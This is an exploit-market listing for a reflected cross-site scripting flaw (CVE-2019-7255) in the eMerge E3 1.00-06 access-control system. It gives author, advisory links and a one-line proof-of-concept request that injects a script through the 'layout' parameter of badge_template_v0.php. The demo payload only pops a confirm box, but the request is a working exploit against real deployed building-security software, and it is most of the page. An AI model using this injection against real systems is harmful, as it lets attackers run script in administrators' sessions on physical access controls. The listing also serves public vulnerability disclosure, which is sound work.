[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

eMerge E3 1.00-06 - (layout) Reflected Cross-Site Scripting Vulnerability

Author
LiquidWorm
Risk
[
Security Risk Low
]
0day-ID
0day-ID-33497
Category
web applications
Date add
12-11-2019
CVE
CVE-2019-7255
Platform
hardware
# Exploit Title: eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7255
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005

# PoC:
GET /badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> HTTP/1.1

#  0day.today [2024-12-25]  #